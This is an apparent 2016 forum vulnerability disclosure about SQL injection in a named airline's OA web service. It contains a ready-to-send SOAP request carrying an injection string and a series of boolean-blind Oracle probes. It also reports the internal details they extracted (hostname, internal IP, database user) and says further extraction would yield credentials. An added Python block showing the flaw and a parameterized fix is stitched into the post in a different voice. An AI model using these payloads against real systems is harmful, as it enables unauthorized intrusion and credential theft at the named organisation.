HanDs
Administrator

[July vulnerability disclosure] Aviation security: web service injection vulnerability in a Juneyao Airlines system



As titled.

Details:

#1 http://oa.juneyaoair.com//services/

1-1.png



#2 Injection point

Code:
POST http://oa.juneyaoair.com//services/MobileService HTTP/1.0
SOAPAction: ""
Content-Type: text/xml

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Header/>
<SOAP-ENV:Body>
<checkUserLogin xmlns="webservices.services.weaver.com.cn">
<in0>1' or '1'='1</in0>
<in1>1</in1>
<in2>1</in2>
</checkUserLogin>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>



1' or '1'='1 returns 5

1' or '1'='2 returns 4
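To show why the two probes above produce different responses and how bound parameters remove that difference, here is an added Python example; it is not code from the original post or from the Weaver OA product, and the users table, the query shape and the column order are assumptions standing in for the real Oracle schema.

```python
import sqlite3

# Constructed sample accounts (not Weaver OA's real schema): five rows.
SAMPLE_USERS = [
    ("alice", "pw-a"), ("bob", "pw-b"), ("carol", "pw-c"),
    ("dave", "pw-d"), ("erin", "pw-e"),
]


def make_db():
    """In-memory SQLite database standing in for the OA Oracle database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (loginid TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def check_user_login_vulnerable(conn, in0, in1):
    """Assumed flaw: the SOAP parameter in0 is spliced into the SQL text.

    With the password predicate first, a probe ending in "or '1'='1" turns the
    WHERE clause into (false AND false) OR true, so every row matches.
    """
    sql = ("SELECT COUNT(*) FROM users WHERE password='%s' AND loginid='%s'"
           % (in1, in0))
    return conn.execute(sql).fetchone()[0]


def check_user_login_fixed(conn, in0, in1):
    """Hardened form: bound parameters, so in0 is only ever compared as a literal."""
    sql = "SELECT COUNT(*) FROM users WHERE password=? AND loginid=?"
    return conn.execute(sql, (in1, in0)).fetchone()[0]


def demo():
    """Run the two probes from the post against both implementations."""
    conn = make_db()
    true_probe, false_probe = "1' or '1'='1", "1' or '1'='2"
    return {
        # vulnerable: (5, 0) -- the boolean oracle the post relies on
        "vulnerable": (check_user_login_vulnerable(conn, true_probe, "x"),
                       check_user_login_vulnerable(conn, false_probe, "x")),
        # fixed: (0, 0) -- both probes are just non-matching login ids
        "fixed": (check_user_login_fixed(conn, true_probe, "x"),
                  check_user_login_fixed(conn, false_probe, "x")),
    }


if __name__ == "__main__":
    print(demo())
```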

#3 Wrote C# code locally to relay the injection

1-2.png



#4 Data evidence

POC:

Code:
1' or (select sys_context('userenv','isdba') from dual)='FALSE' and '1'='1 True
1' or (select sys_context('userenv','current_user') from dual)='OA' and '1'='1 TRUE
1' or (select sys_context('userenv','db_name') from dual)='oanew' and '1'='1 TRUE
1' or (select count(distinct(owner)) from sys.all_tables)=9 and '1'='1 TRUE



Code:
Username: OA
Current database: oanew
Hostname: OA1-SRV
Host IP: 172.20.21.41
Database version: Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production



Database

1-3.png



The OA database has 2008 tables in total

POC:

Code:
1' or (select count(*) from sys.all_tables where owner='OA')=2008 and '1'='1



Only a portion of the tables was listed




It ran too slowly, so I stopped; continuing would yield a large amount of data, such as the OA system's usernames, passwords, etc...

Proof of vulnerability:

Proven!

Fix:

It's not much use anyway; just delete it.


Aviation
Posted: 2016-7-14   |   Views: 0   |   Replies: 0